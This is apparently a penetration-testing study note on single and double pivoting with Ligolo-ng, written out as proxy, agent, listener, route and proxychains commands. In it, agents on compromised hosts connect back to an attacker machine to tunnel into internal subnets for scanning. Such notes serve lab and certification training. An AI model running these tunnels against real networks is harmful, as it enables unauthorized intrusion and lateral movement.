Ligolo-ng Double Pivot
Multi-hop tunneling through segmented AD networks using Ligolo-ng agent chaining. Route injection, interface management, and traffic routing without proxychains.
How Ligolo-ng Works
Ligolo-ng creates a TUN interface on your attacker machine. Traffic routed to that interface is tunneled through the agent connection to the target network β no proxychains required. Each agent can forward traffic to its local network.
Architecture for double pivot:
Kali β [TUN interface] β Agent1 (DMZ host) β [Agent2 listener] β Agent2 (Internal host) β Internal NetworkSingle Pivot Setup
# 1. Download binaries from GitHub (ligolo-ng releases)
# Attacker (Kali): run the proxy
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601
# Target (compromised host): upload and run agent
./agent -connect KALI_IP:11601 -ignore-cert
# Back in proxy console:
session # select Agent1
ifconfig # see target's interfaces
# Add route to internal network (e.g., 172.16.5.0/24)
sudo ip route add 172.16.5.0/24 dev ligolo
start # start tunnel
# Now scan 172.16.5.0/24 directly from Kali
nmap -sV 172.16.5.0/24Double Pivot (Agent Chain)
For double pivot, Agent2 needs to reach back to your proxy. Since Agent2 is on an internal network, you route Agent2's connection through Agent1 using a listener on Agent1.
# Step 1: On Kali, start proxy (same as before)
./proxy -selfcert -laddr 0.0.0.0:11601
# Step 2: Connect Agent1 (DMZ host) to proxy
# [Agent1 session active in proxy console]
# Step 3: Add listener on Agent1 to forward Agent2's connection
# In proxy console with Agent1 selected:
listener_add --addr 0.0.0.0:11602 --to 127.0.0.1:11601
# This means: Agent1 listens on port 11602, forwards to proxy on Kali
# Step 4: On internal host (Agent2), connect to Agent1:11602
./agent -connect AGENT1_IP:11602 -ignore-cert
# Step 5: In proxy console β you now see two sessions
session # select Agent2
# Step 6: Add second TUN interface for the second pivot
sudo ip tuntap add user kali mode tun ligolo2
sudo ip link set ligolo2 up
# Step 7: In proxy, set interface for this session
# (press 's' to start β prompts to select which tunnel interface to use)
start
# Step 8: Add route to deep internal network via ligolo2
sudo ip route add 192.168.100.0/24 dev ligolo2
# Now you can reach 192.168.100.0/24 directly from Kalilistener_add command opens a port on the Agent1 host. Ensure the firewall allows inbound on that port from Agent2's subnet, or the connection will fail silently.
SOCKS5 + Proxychains (Alternative)
The TUN interface handles most protocols natively. Use SOCKS5 only when a specific tool requires it (e.g., some Python scripts). Note: listener_add creates TCP port forwarders (agent-side binding β Kali target) β it is not a SOCKS5 proxy.
# SOCKS5 proxy β run in proxy console with a session active:
socks5 start --addr 127.0.0.1 --port 1080
# This creates a SOCKS5 proxy on Kali that routes through the selected agent tunnel
# Stop it:
socks5 stop
# Configure proxychains to use it:
# /etc/proxychains4.conf:
socks5 127.0.0.1 1080
# Use with tools that need proxychains:
proxychains nmap -sT -Pn 192.168.100.5 -p 445
# listener_add β separate feature (TCP port forwarder on the agent side):
# listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80
# β Opens port 8080 on the agent host, forwards to Kali:80
# Useful for: making your Kali web server reachable from the internal networkExam Tips
- Always run
ifconfigon each agent session to map out new subnets before adding routes - Use
listener_listin the proxy console to see all active listeners/forwarders - If agent disconnects, routes remain β just reconnect and
startagain (no route re-add needed) - For RDP/WinRM through the tunnel, use the IP directly (no proxychains needed β traffic routes via TUN)
- Ligolo-ng beats Chisel for CPTS because you get a proper TUN interface β Nmap SYN scans work natively